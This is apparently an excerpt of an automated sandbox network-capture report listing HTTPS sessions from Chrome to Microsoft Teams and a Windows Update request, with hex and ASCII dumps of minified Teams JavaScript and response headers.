                                                                                                                                                                                                                                                                            2024-12-03 17:59:19 UTC8192INData Raw: 2e 74 65 61 6d 73 2e 63 64 6e 2e 6f 66 66 69 63 65 2e 6e 65 74 2f 74 65 61 6d 73 2d 6d 6f 64 75 6c 61 72 2d 70 61 63 6b 61 67 65 73 2f 68 61 73 68 65 64 2d 61 73 73 65 74 73 2f 39 31 38 36 38 31 2d 62 61 37 36 38 64 65 33 32 63 65 35 32 66 62 39 2e 6a 73 22 2c 69 6e 74 65 67 72 69 74 79 3a 22 73 68 61 32 35 36 2d 62 74 37 79 49 6b 70 59 6e 42 58 71 54 70 6c 6b 78 2b 51 5a 2b 50 36 4e 6f 55 6b 76 65 70 34 42 47 66 56 55 68 75 45 4f 59 74 49 3d 22 2c 69 73 50 6f 6c 79 66 69 6c 6c 3a 21 31 7d 2c 7b 70 61 74 68 3a 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 73 2e 74 65 61 6d 73 2e 63 64 6e 2e 6f 66 66 69 63 65 2e 6e 65 74 2f 74 65 61 6d 73 2d 6d 6f 64 75 6c 61 72 2d 70 61 63 6b 61 67 65 73 2f 68 61 73 68 65 64 2d 61 73 73 65 74 73 2f 32 31 35 31 31 31 2d 32
                                                                                                                                                                                                                                                                            Data Ascii: .teams.cdn.office.net/teams-modular-packages/hashed-assets/918681-ba768de32ce52fb9.js",integrity:"sha256-bt7yIkpYnBXqTplkx+QZ+P6NoUkvep4BGfVUhuEOYtI=",isPolyfill:!1},{path:"https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/215111-2
                                                                                                                                                                                                                                                                            2024-12-03 17:59:19 UTC8192INData Raw: 2f 38 41 6a 73 57 52 4d 51 57 2b 5a 67 49 41 7a 39 56 48 33 48 6c 36 55 6a 2f 65 46 70 62 45 3d 22 2c 69 73 50 6f 6c 79 66 69 6c 6c 3a 21 31 7d 2c 7b 70 61 74 68 3a 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 73 2e 74 65 61 6d 73 2e 63 64 6e 2e 6f 66 66 69 63 65 2e 6e 65 74 2f 74 65 61 6d 73 2d 6d 6f 64 75 6c 61 72 2d 70 61 63 6b 61 67 65 73 2f 68 61 73 68 65 64 2d 61 73 73 65 74 73 2f 33 38 31 34 35 32 2d 62 65 32 38 32 61 38 33 34 36 39 31 65 36 30 30 2e 6a 73 22 2c 69 6e 74 65 67 72 69 74 79 3a 22 73 68 61 32 35 36 2d 32 46 6d 57 74 67 4e 54 62 78 59 57 5a 6a 6f 74 63 48 66 43 36 74 62 71 4c 33 76 4d 55 51 69 71 54 43 6b 46 47 6c 4b 31 65 6d 67 3d 22 2c 69 73 50 6f 6c 79 66 69 6c 6c 3a 21 31 7d 2c 7b 70 61 74 68 3a 22 68 74 74 70 73 3a 2f 2f 73 74 61
                                                                                                                                                                                                                                                                            Data Ascii: /8AjsWRMQW+ZgIAz9VH3Hl6Uj/eFpbE=",isPolyfill:!1},{path:"https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/381452-be282a834691e600.js",integrity:"sha256-2FmWtgNTbxYWZjotcHfC6tbqL3vMUQiqTCkFGlK1emg=",isPolyfill:!1},{path:"https://sta
                                                                                                                                                                                                                                                                            2024-12-03 17:59:19 UTC8192INData Raw: 74 31 36 41 72 72 61 79 22 2c 22 49 6e 74 33 32 41 72 72 61 79 22 2c 22 4d 61 70 22 2c 22 4d 61 74 68 22 2c 22 4f 62 6a 65 63 74 22 2c 22 50 72 6f 6d 69 73 65 22 2c 22 52 65 67 45 78 70 22 2c 22 53 65 74 22 2c 22 53 74 72 69 6e 67 22 2c 22 53 79 6d 62 6f 6c 22 2c 22 54 79 70 65 45 72 72 6f 72 22 2c 22 55 69 6e 74 38 41 72 72 61 79 22 2c 22 55 69 6e 74 38 43 6c 61 6d 70 65 64 41 72 72 61 79 22 2c 22 55 69 6e 74 31 36 41 72 72 61 79 22 2c 22 55 69 6e 74 33 32 41 72 72 61 79 22 2c 22 57 65 61 6b 4d 61 70 22 2c 22 5f 22 2c 22 63 6c 65 61 72 54 69 6d 65 6f 75 74 22 2c 22 69 73 46 69 6e 69 74 65 22 2c 22 70 61 72 73 65 49 6e 74 22 2c 22 73 65 74 54 69 6d 65 6f 75 74 22 5d 2c 65 74 3d 2d 31 2c 75 74 3d 7b 7d 3b 75 74 5b 57 5d 3d 75 74 5b 4c 5d 3d 75 74 5b 55 5d
                                                                                                                                                                                                                                                                            Data Ascii: t16Array","Int32Array","Map","Math","Object","Promise","RegExp","Set","String","Symbol","TypeError","Uint8Array","Uint8ClampedArray","Uint16Array","Uint32Array","WeakMap","_","clearTimeout","isFinite","parseInt","setTimeout"],et=-1,ut={};ut[W]=ut[L]=ut[U]
                                                                                                                                                                                                                                                                            2024-12-03 17:59:19 UTC8192INData Raw: 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 50 72 28 6e 29 7b 76 61 72 20 74 3d 2d 31 2c 72 3d 6e 75 6c 6c 3d 3d 6e 3f 30 3a 6e 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 74 68 69 73 2e 63 6c 65 61 72 28 29 3b 2b 2b 74 3c 72 3b 29 7b 76 61 72 20 65 3d 6e 5b 74 5d 3b 74 68 69 73 2e 73 65 74 28 65 5b 30 5d 2c 65 5b 31 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 71 72 28 6e 29 7b 76 61 72 20 74 3d 2d 31 2c 72 3d 6e 75 6c 6c 3d 3d 6e 3f 30 3a 6e 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 74 68 69 73 2e 63 6c 65 61 72 28 29 3b 2b 2b 74 3c 72 3b 29 7b 76 61 72 20 65 3d 6e 5b 74 5d 3b 74 68 69 73 2e 73 65 74 28 65 5b 30 5d 2c 65 5b 31 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 5a 72 28 6e 29 7b 76 61 72 20 74 3d 2d 31 2c 72 3d 6e 75 6c 6c 3d 3d 6e 3f 30 3a 6e 2e 6c 65 6e 67 74 68 3b 66 6f 72
                                                                                                                                                                                                                                                                            Data Ascii: )}}function Pr(n){var t=-1,r=null==n?0:n.length;for(this.clear();++t<r;){var e=n[t];this.set(e[0],e[1])}}function qr(n){var t=-1,r=null==n?0:n.length;for(this.clear();++t<r;){var e=n[t];this.set(e[0],e[1])}}function Zr(n){var t=-1,r=null==n?0:n.length;for


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            36192.168.2.44980252.123.129.144431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:21 UTC645OUTGET /v2/worker/precompiled-web-worker-7fb380386db128ff.js HTTP/1.1
                                                                                                                                                                                                                                                                            Host: teams.microsoft.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: same-origin
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: worker
                                                                                                                                                                                                                                                                            Referer: https://teams.microsoft.com/v2/
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            Cookie: MUIDB=28C464D8E51F67EE36DA7192E47D666E; clocale=en-us
                                                                                                                                                                                                                                                                            2024-12-03 17:59:22 UTC7820INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Cache-Control: no-store, no-transform, must-revalidate, no-cache
                                                                                                                                                                                                                                                                            Content-Length: 9826298
                                                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                            Expires: Mon, 02 Dec 2024 17:59:22 GMT
                                                                                                                                                                                                                                                                            strict-transport-security: max-age=2592000
                                                                                                                                                                                                                                                                            x-ring-info: web: general [assigned];
                                                                                                                                                                                                                                                                            content-security-policy: block-all-mixed-content;base-uri 'none';child-src blob: data: https:;connect-src 'self' blob: data: https: http://localhost:4318 *.office.net ws://localhost:* wss://127.0.0.1:9002 wss://view-localhost:* wss://*.svc.ms wss://augloop-dogfood.officeppe.com wss://augloop.office.com wss://augloop.svc.cloud.microsoft wss://augloop-gcc.office.com wss://*.augloop-dogfood.officeppe.com wss://*.augloop.office.com wss://*.augloop-gcc.office.com wss://*.augloop.svc.cloud.microsoft wss://*.pptservicescast.edog.officeapps.live.com wss://*.pptservicescast.officeapps.live.com wss://pptservicescast.edog.officeapps.live.com wss://pptservicescast.gcc.osi.office365.us wss://pptservicescast.officeapps.live.com wss://pptservicescast.osi.office365.us wss://*.attend.teams.microsoft.com wss://*.attend.teams.microsoft.net wss://*.attend.gcc.teams.microsoft.com wss://attend.gcc.teams.microsoft.com wss://*.cts.azure.us wss://*.cts.speech.microsoft.com wss://*.cts.speech-test.microsoft.com wss://*.enterprisevoice [TRUNCATED]
                                                                                                                                                                                                                                                                            content-security-policy-report-only: img-src 'self' blob: data: https://statics.teams.cdn.office.net *.ams.gcc.teams.microsoft.com *.asm.skype.com *.asyncgw.teams.microsoft.com *.giphy.com *.loki.delve.office.com *.office.net *.officeapps.live.com *.sharepoint-df.com *.sharepoint.com bot-framework.azureedge.net connectoricons-prod.azureedge.net content.powerapps.com docs.botframework.com i.vimeocdn.com i.ytimg.com local.teams.office.com:* marketplacecdn.azureedge.net media.licdn.com outlook.office.com pbs.twimg.com raw.githubusercontent.com skypeteamsbotstorage.blob.core.windows.net statics.teams.microsoft.com substrate.office.com teams.microsoft.com urlp.sfbassets.com www.odwebp.svc.ms;frame-src https: mailto: ms-appx-web: ms-excel: ms-powerpoint: ms-visio: ms-whiteboard-preview: ms-word: msteams: onenote: pdf: sip: sips:;script-src 'nonce-8bT5RNXsw7MXXIEoa9YLmg==' 'report-sample' https://statics.teams.cdn.office.net browser.events.data.microsoft.com local.teams.microsoft.invalid c1-powerpoint-15.cdn.office. [TRUNCATED]
                                                                                                                                                                                                                                                                            requestid: ab1fb776db7dbe1ccfcb732e817b7974
                                                                                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                                                                                            timing-allow-origin: *
                                                                                                                                                                                                                                                                            x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                            x-envoy-upstream-service-time: 18
                                                                                                                                                                                                                                                                            x-request-id: a4e09fc4-4812-4ea1-8d64-ebd2e800aff9
                                                                                                                                                                                                                                                                            X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: 0C8DE44777124F99B614E1871D53DFB7 Ref B: EWR30EDGE0309 Ref C: 2024-12-03T17:59:22Z
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:21 GMT
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            2024-12-03 17:59:22 UTC2811INData Raw: 28 28 29 3d 3e 7b 76 61 72 20 65 2c 74 2c 6e 2c 72 2c 61 2c 69 3d 7b 38 34 33 37 36 3a 65 3d 3e 7b 65 2e 65 78 70 6f 72 74 73 3d 5b 7b 74 79 70 65 73 3a 7b 43 61 6c 6c 69 6e 67 53 65 72 76 69 63 65 53 74 61 74 65 3a 5b 35 2c 5b 22 46 61 69 6c 65 64 22 2c 22 4e 6f 74 52 65 61 64 79 22 2c 22 52 65 61 64 79 22 5d 5d 2c 43 61 6c 6c 53 74 61 72 74 54 69 6d 65 73 74 61 6d 70 3a 5b 32 2c 7b 74 65 61 6d 73 43 61 6c 6c 49 64 3a 35 2c 74 69 6d 65 73 74 61 6d 70 3a 34 7d 5d 2c 49 6e 73 74 61 6e 74 4d 65 65 74 69 6e 67 49 6e 66 6f 3a 5b 32 2c 7b 75 72 6c 3a 31 2c 6d 65 65 74 69 6e 67 43 6f 64 65 3a 31 2c 70 61 73 73 63 6f 64 65 3a 31 2c 65 76 65 6e 74 44 61 74 61 3a 22 53 63 68 65 64 75 6c 69 6e 67 53 65 72 76 69 63 65 4d 65 65 74 69 6e 67 45 76 65 6e 74 54 79 70 65
                                                                                                                                                                                                                                                                            Data Ascii: (()=>{var e,t,n,r,a,i={84376:e=>{e.exports=[{types:{CallingServiceState:[5,["Failed","NotReady","Ready"]],CallStartTimestamp:[2,{teamsCallId:5,timestamp:4}],InstantMeetingInfo:[2,{url:1,meetingCode:1,passcode:1,eventData:"SchedulingServiceMeetingEventType
                                                                                                                                                                                                                                                                            2024-12-03 17:59:22 UTC5886INData Raw: 74 74 69 6e 67 73 3a 22 43 61 6c 6c 52 65 64 69 72 65 63 74 69 6f 6e 53 65 74 74 69 6e 67 73 21 22 7d 5d 2c 43 61 6c 6c 52 65 64 69 72 65 63 74 69 6f 6e 53 65 74 74 69 6e 67 73 3a 5b 32 2c 7b 63 61 6c 6c 46 6f 72 77 61 72 64 69 6e 67 53 65 74 74 69 6e 67 73 3a 22 43 61 6c 6c 46 6f 72 77 61 72 64 69 6e 67 53 65 74 74 69 6e 67 73 21 22 2c 63 61 6c 6c 47 72 6f 75 70 44 65 74 61 69 6c 73 3a 22 43 61 6c 6c 47 72 6f 75 70 44 65 74 61 69 6c 73 22 2c 75 6e 61 6e 73 77 65 72 65 64 43 61 6c 6c 53 65 74 74 69 6e 67 73 3a 22 43 61 6c 6c 55 6e 61 6e 73 77 65 72 65 64 53 65 74 74 69 6e 67 73 22 2c 66 61 76 6f 72 69 74 65 54 61 72 67 65 74 73 3a 22 43 61 6c 6c 52 65 64 69 72 65 63 74 69 6f 6e 46 61 76 6f 72 69 74 65 54 61 72 67 65 74 73 22 7d 5d 2c 43 61 6c 6c 52 65 64
                                                                                                                                                                                                                                                                            Data Ascii: ttings:"CallRedirectionSettings!"}],CallRedirectionSettings:[2,{callForwardingSettings:"CallForwardingSettings!",callGroupDetails:"CallGroupDetails",unansweredCallSettings:"CallUnansweredSettings",favoriteTargets:"CallRedirectionFavoriteTargets"}],CallRed
                                                                                                                                                                                                                                                                            2024-12-03 17:59:22 UTC8192INData Raw: 65 6c 65 74 65 64 47 72 6f 75 70 3a 22 42 75 64 64 79 47 72 6f 75 70 22 7d 5d 2c 44 65 6c 65 67 61 74 65 53 65 74 74 69 6e 67 73 43 68 61 6e 67 65 64 45 76 65 6e 74 3a 5b 32 2c 7b 64 65 6c 65 67 61 74 65 53 65 74 74 69 6e 67 73 3a 22 44 65 6c 65 67 61 74 65 53 65 74 74 69 6e 67 73 21 22 7d 5d 2c 73 6c 61 43 61 6c 6c 73 43 68 61 6e 67 65 64 45 76 65 6e 74 3a 5b 32 2c 7b 73 6c 61 43 61 6c 6c 73 3a 22 5b 53 68 61 72 65 64 4c 69 6e 65 41 63 74 69 76 65 43 61 6c 6c 49 6e 66 6f 21 5d 21 22 7d 5d 2c 4f 6e 67 6f 69 6e 67 43 6f 6e 73 75 6c 74 61 74 69 6f 6e 3a 5b 32 2c 7b 63 6f 6e 76 65 72 73 61 74 69 6f 6e 49 64 3a 31 30 2c 69 73 43 6f 6e 73 75 6c 74 3a 37 2c 63 6f 6e 73 75 6c 74 43 6f 6e 74 65 78 74 3a 22 43 6f 6e 73 75 6c 74 43 6f 6e 74 65 78 74 22 7d 5d 2c 56
                                                                                                                                                                                                                                                                            Data Ascii: eletedGroup:"BuddyGroup"}],DelegateSettingsChangedEvent:[2,{delegateSettings:"DelegateSettings!"}],slaCallsChangedEvent:[2,{slaCalls:"[SharedLineActiveCallInfo!]!"}],OngoingConsultation:[2,{conversationId:10,isConsult:7,consultContext:"ConsultContext"}],V
                                                                                                                                                                                                                                                                            2024-12-03 17:59:22 UTC8192INData Raw: 65 63 74 65 64 49 6e 74 65 72 70 72 65 74 61 74 69 6f 6e 47 72 6f 75 70 3a 5b 36 2c 7b 69 64 3a 31 2c 6c 61 62 65 6c 3a 31 7d 5d 2c 44 65 76 69 63 65 73 4d 65 65 74 69 6e 67 54 79 70 65 3a 5b 35 2c 5b 22 55 6e 6b 6e 6f 77 6e 22 2c 22 54 65 61 6d 73 22 2c 22 53 6b 79 70 65 22 2c 22 57 65 62 65 78 22 2c 22 5a 6f 6f 6d 22 2c 22 42 6c 75 65 4a 65 61 6e 73 22 2c 22 47 6f 54 6f 22 5d 5d 2c 44 65 76 69 63 65 73 4d 65 65 74 69 6e 67 4d 65 74 61 64 61 74 61 49 6e 70 75 74 3a 5b 36 2c 7b 73 75 62 6a 65 63 74 3a 31 2c 6f 72 67 61 6e 69 7a 65 72 4e 61 6d 65 3a 31 2c 73 74 61 72 74 54 69 6d 65 3a 22 44 61 74 65 54 69 6d 65 22 2c 65 6e 64 54 69 6d 65 3a 22 44 61 74 65 54 69 6d 65 22 2c 69 73 50 72 69 76 61 74 65 3a 32 2c 6d 65 65 74 69 6e 67 49 64 3a 31 2c 74 68 72 65
                                                                                                                                                                                                                                                                            Data Ascii: ectedInterpretationGroup:[6,{id:1,label:1}],DevicesMeetingType:[5,["Unknown","Teams","Skype","Webex","Zoom","BlueJeans","GoTo"]],DevicesMeetingMetadataInput:[6,{subject:1,organizerName:1,startTime:"DateTime",endTime:"DateTime",isPrivate:2,meetingId:1,thre
                                                                                                                                                                                                                                                                            2024-12-03 17:59:22 UTC102INData Raw: 72 65 61 74 65 4d 65 65 74 69 6e 67 4e 6f 74 65 73 3a 5b 22 4d 65 65 74 69 6e 67 4e 6f 74 65 73 4c 69 6e 6b 21 22 2c 7b 74 65 61 6d 73 43 61 6c 6c 49 64 3a 31 30 7d 5d 2c 61 63 63 65 70 74 42 6c 6f 63 6b 53 66 43 43 68 61 74 3a 5b 32 2c 7b 63 6f 6e 76 49 64 3a 31 30 2c 61 63 74 69 6f 6e 3a 22 43 6f 6e 74
                                                                                                                                                                                                                                                                            Data Ascii: reateMeetingNotes:["MeetingNotesLink!",{teamsCallId:10}],acceptBlockSfCChat:[2,{convId:10,action:"Cont
                                                                                                                                                                                                                                                                            2024-12-03 17:59:22 UTC8192INData Raw: 61 63 74 41 63 63 65 70 74 4f 72 42 6c 6f 63 6b 41 63 74 69 6f 6e 21 22 2c 63 61 6c 6c 65 72 49 6e 66 6f 3a 36 7d 5d 2c 63 6f 6e 74 61 63 74 41 63 63 65 70 74 4f 72 42 6c 6f 63 6b 45 78 74 65 6e 64 65 64 3a 5b 22 42 6c 6f 63 6b 65 64 43 6f 6e 74 61 63 74 55 70 64 61 74 65 45 78 74 65 6e 64 65 64 21 22 2c 7b 63 6f 6e 76 49 64 3a 31 30 2c 61 63 74 69 6f 6e 3a 22 43 6f 6e 74 61 63 74 41 63 63 65 70 74 4f 72 42 6c 6f 63 6b 41 63 74 69 6f 6e 21 22 2c 63 61 6c 6c 65 72 49 6e 66 6f 3a 36 2c 61 64 64 49 6e 76 69 74 65 72 54 6f 41 63 63 65 70 74 4c 69 73 74 3a 32 7d 5d 2c 61 64 64 42 6c 6f 63 6b 65 64 4d 72 69 3a 5b 37 2c 7b 6d 72 69 3a 36 2c 63 61 6c 6c 65 72 49 6e 66 6f 3a 36 7d 5d 2c 64 65 6c 65 74 65 42 6c 6f 63 6b 65 64 4d 72 69 3a 5b 37 2c 7b 6d 72 69 3a 36
                                                                                                                                                                                                                                                                            Data Ascii: actAcceptOrBlockAction!",callerInfo:6}],contactAcceptOrBlockExtended:["BlockedContactUpdateExtended!",{convId:10,action:"ContactAcceptOrBlockAction!",callerInfo:6,addInviterToAcceptList:2}],addBlockedMri:[7,{mri:6,callerInfo:6}],deleteBlockedMri:[7,{mri:6
                                                                                                                                                                                                                                                                            2024-12-03 17:59:22 UTC8192INData Raw: 74 65 45 76 65 6e 74 3a 5b 32 2c 7b 61 63 63 6f 75 6e 74 49 64 3a 31 2c 74 65 6e 61 6e 74 3a 22 54 65 6e 61 6e 74 44 61 74 61 22 2c 69 73 54 65 6e 61 6e 74 44 65 6c 65 74 65 64 3a 32 7d 5d 2c 50 74 7a 50 61 72 74 69 63 69 70 61 6e 74 3a 5b 32 2c 7b 69 64 3a 31 30 2c 64 69 73 70 6c 61 79 4e 61 6d 65 3a 31 2c 61 63 74 69 76 65 3a 32 7d 5d 2c 50 74 7a 43 61 70 61 62 6c 65 50 61 72 74 69 63 69 70 61 6e 74 73 3a 5b 32 2c 7b 70 61 72 74 69 63 69 70 61 6e 74 73 3a 22 5b 50 74 7a 50 61 72 74 69 63 69 70 61 6e 74 21 5d 22 7d 5d 2c 43 6f 6e 74 65 6e 74 53 68 61 72 69 6e 67 53 65 73 73 69 6f 6e 3a 5b 34 2c 5b 22 50 70 74 53 68 61 72 69 6e 67 53 65 73 73 69 6f 6e 22 2c 22 57 68 69 74 65 62 6f 61 72 64 53 68 61 72 69 6e 67 53 65 73 73 69 6f 6e 22 5d 5d 2c 43 6f 6e 74
                                                                                                                                                                                                                                                                            Data Ascii: teEvent:[2,{accountId:1,tenant:"TenantData",isTenantDeleted:2}],PtzParticipant:[2,{id:10,displayName:1,active:2}],PtzCapableParticipants:[2,{participants:"[PtzParticipant!]"}],ContentSharingSession:[4,["PptSharingSession","WhiteboardSharingSession"]],Cont
                                                                                                                                                                                                                                                                            2024-12-03 17:59:22 UTC8192INData Raw: 44 61 74 65 54 69 6d 65 55 74 63 3a 22 44 61 74 65 54 69 6d 65 21 22 2c 74 72 61 6e 73 63 72 69 70 74 43 6f 6e 66 69 64 65 6e 63 65 3a 39 2c 64 69 73 70 6c 61 79 43 6c 65 61 6e 43 6f 6e 74 65 6e 74 3a 31 2c 75 74 74 65 72 61 6e 63 65 49 6e 64 65 78 3a 33 7d 5d 2c 49 6e 64 69 63 65 73 49 6e 70 75 74 3a 5b 36 2c 7b 6f 66 66 73 65 74 3a 33 2c 6c 65 6e 67 74 68 3a 33 7d 5d 2c 41 63 74 69 6f 6e 49 74 65 6d 4f 77 6e 65 72 49 6e 70 75 74 3a 5b 36 2c 7b 75 73 65 72 3a 22 55 73 65 72 46 75 6c 6c 49 6e 70 75 74 21 22 2c 6f 77 6e 65 72 73 68 69 70 54 79 70 65 3a 22 41 63 74 69 6f 6e 49 74 65 6d 4f 77 6e 65 72 73 68 69 70 54 79 70 65 21 22 7d 5d 2c 41 63 74 69 6f 6e 49 74 65 6d 49 6e 70 75 74 3a 5b 36 2c 7b 69 64 3a 31 30 2c 63 61 6c 6c 49 64 3a 31 2c 61 72 74 69 66
                                                                                                                                                                                                                                                                            Data Ascii: DateTimeUtc:"DateTime!",transcriptConfidence:9,displayCleanContent:1,utteranceIndex:3}],IndicesInput:[6,{offset:3,length:3}],ActionItemOwnerInput:[6,{user:"UserFullInput!",ownershipType:"ActionItemOwnershipType!"}],ActionItemInput:[6,{id:10,callId:1,artif
                                                                                                                                                                                                                                                                            2024-12-03 17:59:22 UTC8192INData Raw: 6e 66 6f 3a 5b 32 2c 7b 69 64 3a 31 30 7d 5d 2c 4d 65 65 74 69 6e 67 42 72 61 6e 64 69 6e 67 49 6e 66 6f 3a 5b 32 2c 7b 64 65 66 61 75 6c 74 54 68 65 6d 65 3a 31 2c 6d 65 65 74 69 6e 67 42 72 61 6e 64 69 6e 67 54 68 65 6d 65 73 3a 22 5b 4d 65 65 74 69 6e 67 42 72 61 6e 64 69 6e 67 54 68 65 6d 65 21 5d 22 2c 6c 6f 62 62 79 4c 6f 67 6f 42 72 61 6e 64 69 6e 67 49 6d 61 67 65 73 3a 22 5b 4c 6f 62 62 79 4c 6f 67 6f 42 72 61 6e 64 69 6e 67 49 6d 61 67 65 21 5d 22 7d 5d 2c 4c 6f 62 62 79 4c 6f 67 6f 42 72 61 6e 64 69 6e 67 49 6d 61 67 65 3a 5b 32 2c 7b 69 6d 61 67 65 55 72 69 3a 36 7d 5d 2c 4d 65 65 74 69 6e 67 42 72 61 6e 64 69 6e 67 54 68 65 6d 65 3a 5b 32 2c 7b 69 64 65 6e 74 69 74 79 3a 35 2c 64 69 73 70 6c 61 79 4e 61 6d 65 3a 31 2c 65 6e 61 62 6c 65 64 3a
                                                                                                                                                                                                                                                                            Data Ascii: nfo:[2,{id:10}],MeetingBrandingInfo:[2,{defaultTheme:1,meetingBrandingThemes:"[MeetingBrandingTheme!]",lobbyLogoBrandingImages:"[LobbyLogoBrandingImage!]"}],LobbyLogoBrandingImage:[2,{imageUri:6}],MeetingBrandingTheme:[2,{identity:5,displayName:1,enabled:
                                                                                                                                                                                                                                                                            2024-12-03 17:59:22 UTC8192INData Raw: 69 63 69 70 61 6e 74 50 69 6e 3a 31 7d 5d 2c 4d 65 65 74 69 6e 67 44 61 74 61 49 6e 70 75 74 3a 5b 36 2c 7b 6d 65 65 74 69 6e 67 43 6f 64 65 3a 31 2c 70 61 73 73 63 6f 64 65 3a 31 2c 6d 65 65 74 69 6e 67 55 72 6c 3a 31 7d 5d 2c 49 6e 73 74 61 6e 74 4d 65 65 74 69 6e 67 4f 70 74 69 6f 6e 73 49 6e 70 75 74 3a 5b 36 2c 7b 69 64 3a 35 2c 65 78 69 73 74 69 6e 67 45 76 65 6e 74 3a 22 53 63 68 65 64 75 6c 69 6e 67 53 65 72 76 69 63 65 45 76 65 6e 74 49 6e 70 75 74 22 7d 5d 2c 42 72 6f 61 64 63 61 73 74 50 61 79 6c 6f 61 64 49 6e 70 75 74 3a 5b 36 2c 7b 72 6f 6c 65 3a 22 42 72 6f 61 64 63 61 73 74 50 61 72 74 69 63 69 70 61 6e 74 52 6f 6c 65 21 22 7d 5d 2c 52 65 67 69 73 74 72 61 74 69 6f 6e 50 61 79 6c 6f 61 64 49 6e 70 75 74 3a 5b 36 2c 7b 70 61 72 74 69 63 69
                                                                                                                                                                                                                                                                            Data Ascii: icipantPin:1}],MeetingDataInput:[6,{meetingCode:1,passcode:1,meetingUrl:1}],InstantMeetingOptionsInput:[6,{id:5,existingEvent:"SchedulingServiceEventInput"}],BroadcastPayloadInput:[6,{role:"BroadcastParticipantRole!"}],RegistrationPayloadInput:[6,{partici


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            37192.168.2.44986052.149.20.212443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:33 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=dP4PbSHbpM+gPBT&MD=utld16HU HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                            Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                            2024-12-03 17:59:33 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                            ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                                                                                                            MS-CorrelationId: aaa28406-34c6-47cd-bd58-482872054e97
                                                                                                                                                                                                                                                                            MS-RequestId: 81ae71e7-5cfc-4967-93cf-289accfaaedc
                                                                                                                                                                                                                                                                            MS-CV: qr8g8KQaCEGtL2Ly.0
                                                                                                                                                                                                                                                                            X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:33 GMT
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Content-Length: 30005
